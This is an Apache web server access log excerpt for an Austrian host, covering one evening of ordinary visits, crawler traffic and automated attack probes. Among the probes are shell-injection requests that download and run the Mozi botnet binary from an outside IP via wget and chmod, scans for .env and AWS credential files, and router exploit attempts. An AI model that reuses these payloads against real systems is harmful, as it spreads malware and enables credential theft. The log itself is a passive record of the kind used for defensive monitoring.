178.165.186.69 - - [18/Feb/2025:16:57:46 +0100] "GET /entry.php?id=10271&&ser=894206 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894145" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:16:57:46 +0100] "GET /gui/javascript/form_form.js?1739894266 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:16:58:46 +0100] "GET /entry.php?id=10271&&ser=894266 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:16:58:46 +0100] "GET /gui/javascript/form_form.js?1739894326 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894266" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:16:59:46 +0100] "GET /entry.php?id=10271&&ser=894326 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894266" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:16:59:46 +0100] "GET /gui/javascript/form_form.js?1739894386 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894326" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:00:47 +0100] "GET /entry.php?id=10271&&ser=894386 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=894326" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:00:47 +0100] "GET /gui/javascript/form_form.js?1739894447 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894386" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:01:47 +0100] "GET /entry.php?id=10271&&ser=894447 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894386" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:01:47 +0100] "GET /gui/javascript/form_form.js?1739894507 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894447" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:02:47 +0100] "GET /entry.php?id=10271&&ser=894507 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894447" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:02:47 +0100] "GET /gui/javascript/form_form.js?1739894567 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894507" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
138.197.125.169 - - [18/Feb/2025:17:03:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
138.197.125.169 - - [18/Feb/2025:17:03:01 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (compatible)"
178.165.186.69 - - [18/Feb/2025:17:03:47 +0100] "GET /entry.php?id=10271&&ser=894567 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=894507" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:03:48 +0100] "GET /gui/javascript/form_form.js?1739894628 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894567" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:04:48 +0100] "GET /entry.php?id=10271&&ser=894628 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894567" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:04:48 +0100] "GET /gui/javascript/form_form.js?1739894688 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894628" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:05:48 +0100] "GET /entry.php?id=10271&&ser=894688 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894628" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:05:48 +0100] "GET /gui/javascript/form_form.js?1739894748 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894688" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:06:48 +0100] "GET /entry.php?id=10271&&ser=894748 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894688" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:06:48 +0100] "GET /gui/javascript/form_form.js?1739894808 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894748" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:07:49 +0100] "GET /entry.php?id=10271&&ser=894808 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894748" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:07:49 +0100] "GET /gui/javascript/form_form.js?1739894869 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894808" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:08:49 +0100] "GET /entry.php?id=10271&&ser=894869 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894808" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:08:49 +0100] "GET /gui/javascript/form_form.js?1739894929 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894869" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:09:49 +0100] "GET /entry.php?id=10271&&ser=894929 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=894869" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:09:49 +0100] "GET /gui/javascript/form_form.js?1739894989 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894929" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:10:50 +0100] "GET /entry.php?id=10271&&ser=894989 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=894929" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:10:50 +0100] "GET /gui/javascript/form_form.js?1739895050 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=894989" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:11:50 +0100] "GET /entry.php?id=10271&&ser=895050 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=894989" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:11:50 +0100] "GET /gui/javascript/form_form.js?1739895110 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895050" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:12:20 +0100] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1880 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:12:20 +0100] "GET /gui/javascript/form_form.js?1739895140 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:12:21 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 2434 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:12:22 +0100] "GET /gui/javascript/form_form.js?1739895142 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:12:22 +0100] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1913 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [18/Feb/2025:17:12:22 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
156.59.198.135 - - [18/Feb/2025:17:23:57 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109171703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Feb/2025:17:27:56 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108191403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:17:39:58 +0100] "GET /hausegger.activities.at/stats/lang/awstats-gr.txt HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.116 - - [18/Feb/2025:17:45:05 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
156.59.198.136 - - [18/Feb/2025:18:04:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201907181103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:18:08:44 +0100] "GET /renault.2web.at/htdocs/binaries/10019519.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:18:12:45 +0100] "GET /hausegger.activities.at/stats/lang/awstats-si.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:18:16:45 +0100] "GET /hausegger.activities.at/stats/lang/awstats-he.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [18/Feb/2025:18:18:55 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [18/Feb/2025:18:20:45 +0100] "GET /hausegger.activities.at/stats/lang/awstats-hr.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Feb/2025:18:24:45 +0100] "GET /hausegger.activities.at/stats/lang/awstats-en.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:18:28:45 +0100] "GET /renault.2web.at/htdocs/binaries/10117642.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
66.240.236.116 - - [18/Feb/2025:18:34:26 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
141.255.166.90 - - [18/Feb/2025:18:34:44 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [18/Feb/2025:18:48:47 +0100] "GET /renault.2web.at/htdocs/binaries/10223415.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.62.208.75 - - [18/Feb/2025:18:50:20 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0"
156.59.198.136 - - [18/Feb/2025:18:52:48 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/optimizer/err.txt HTTP/1.0" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:18:56:47 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202003061203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
117.223.40.251 - - [18/Feb/2025:18:57:01 +0100] "POST /HNAP1/ HTTP/1.0" 400 373 "-" "-"
134.209.7.137 - - [18/Feb/2025:18:57:23 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0"
156.59.198.135 - - [18/Feb/2025:19:10:36 +0100] "GET /hausegger.activities.at/stats/lang/awstats-nl.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:19:20:57 +0100] "GET /renault.2web.at/htdocs/binaries/10044339.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.51 - - [18/Feb/2025:19:21:29 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
141.255.166.90 - - [18/Feb/2025:19:23:07 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
103.153.76.231 - - [18/Feb/2025:19:40:21 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
103.153.76.231 - - [18/Feb/2025:19:40:21 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
156.59.198.135 - - [18/Feb/2025:19:54:10 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002171603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [18/Feb/2025:19:56:02 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.68.89.51 - - [18/Feb/2025:20:02:15 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
103.158.96.157 - - [18/Feb/2025:20:07:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://172.35.12.211:46112/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 350 "-" "Hello, world"
156.59.198.135 - - [18/Feb/2025:20:15:17 +0100] "GET /default/cgi-bin/lang/awstats-id.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.177 - - [18/Feb/2025:20:22:18 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.177 - - [18/Feb/2025:20:22:18 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Opera/9.80 (Linux mips ; U; HbbTV/1.1.1 (; Philips; ; ; ; ) CE-HTML/1.0 NETTV/3.2.4; en) Presto/2.6.33 Version/10.70"
78.153.140.177 - - [18/Feb/2025:20:22:19 +0100] "GET /.ENV HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Linux; Android 4.3; Nexus 10 Build/JSS15Q) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.72 Safari/537.36 DMBrowser-UV"
78.153.140.177 - - [18/Feb/2025:20:22:19 +0100] "GET /.Env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24"
78.153.140.177 - - [18/Feb/2025:20:22:19 +0100] "GET /.AWS/credentials HTTP/1.1" 404 361 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BO2IE8_v1;ENUS)"
78.153.140.177 - - [18/Feb/2025:20:22:20 +0100] "GET /.AWS/CREDENTIALS HTTP/1.1" 404 361 "-" "Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.153.140.177 - - [18/Feb/2025:20:22:21 +0100] "GET /.Aws/credentials HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.153.140.177 - - [18/Feb/2025:20:22:30 +0100] "GET /.CONFIG.yaml HTTP/1.1" 404 357 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61"
78.153.140.177 - - [18/Feb/2025:20:22:39 +0100] "GET /.Config.yaml HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-nz; GT-P5210 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.177 - - [18/Feb/2025:20:22:39 +0100] "GET /.env.BAK HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 5.2; rv:42.0) Gecko/20100101 Firefox/42.0"
78.153.140.177 - - [18/Feb/2025:20:22:41 +0100] "GET /.ENV.example HTTP/1.1" 404 357 "-" "Mozilla/5.0(Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6"
78.153.140.177 - - [18/Feb/2025:20:22:42 +0100] "GET /.env.EXAMPLE HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
78.153.140.177 - - [18/Feb/2025:20:22:44 +0100] "GET /.ENV.EXAMPLE HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 GTB7.0"
78.153.140.177 - - [18/Feb/2025:20:22:44 +0100] "GET /ADMIN/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux i686; rv:35.0) Gecko/20100101 Firefox/35.0"
78.153.140.177 - - [18/Feb/2025:20:22:45 +0100] "GET /Admin/.env HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E; EIE10;PTBRWOL)"
78.153.140.177 - - [18/Feb/2025:20:22:45 +0100] "GET /Application/.env HTTP/1.1" 404 361 "-" "Opera/9.80 (Android; Opera Mini/27.0.2254/66.247; U; en) Presto/2.12.423 Version/12.16"
78.153.140.177 - - [18/Feb/2025:20:22:45 +0100] "GET /APPLICATION/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; GT-P5113 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.177 - - [18/Feb/2025:20:22:46 +0100] "GET /BACKEND/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3"
78.153.140.177 - - [18/Feb/2025:20:22:46 +0100] "GET /Config/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
78.153.140.177 - - [18/Feb/2025:20:22:46 +0100] "GET /CONFIG/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 OPR/29.0.1795.47 (Edition RMV)"
78.153.140.177 - - [18/Feb/2025:20:22:47 +0100] "GET /Core/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.50"
78.153.140.177 - - [18/Feb/2025:20:22:47 +0100] "GET /CORE/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.76 Safari/537.36"
78.153.140.177 - - [18/Feb/2025:20:22:48 +0100] "GET /Cp/.env HTTP/1.1" 404 352 "-" "Opera/9.52 (Windows NT 6.0; U; en)"
78.153.140.177 - - [18/Feb/2025:20:22:48 +0100] "GET /CP/.env HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
78.153.140.177 - - [18/Feb/2025:20:22:49 +0100] "GET /Credentials HTTP/1.1" 404 356 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)"
78.153.140.177 - - [18/Feb/2025:20:22:50 +0100] "GET /CREDENTIALS HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/10.0.1 Safari/601.3.9"
78.153.140.177 - - [18/Feb/2025:20:22:52 +0100] "GET /Crm/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B146 Safari/8536.25"
78.153.140.177 - - [18/Feb/2025:20:22:58 +0100] "GET /CRM/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/50.0.2762.67"
78.153.140.177 - - [18/Feb/2025:20:23:02 +0100] "GET /Data/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-gb) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8"
78.153.140.177 - - [18/Feb/2025:20:23:06 +0100] "GET /DATA/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)"
173.249.3.232 - - [18/Feb/2025:20:24:51 +0100] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 320 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
114.32.83.76 - - [18/Feb/2025:20:26:39 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
122.194.9.134 - - [18/Feb/2025:20:32:39 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 383 "-" "-"
198.235.24.81 - - [18/Feb/2025:20:51:06 +0100] "\x16\x03\x01" 400 383 "-" "-"
198.235.24.81 - - [18/Feb/2025:20:51:07 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [18/Feb/2025:20:53:30 +0100] "GET /default/cgi-bin/lang/awstats-nb.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Feb/2025:21:02:45 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12001070.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:21:06:44 +0100] "GET /default/cgi-bin/lang/awstats-es.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.181.187.69 - - [18/Feb/2025:21:10:30 +0100] "GET / HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
156.59.198.135 - - [18/Feb/2025:21:13:21 +0100] "GET /default/cgi-bin/lang/awstats-de.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
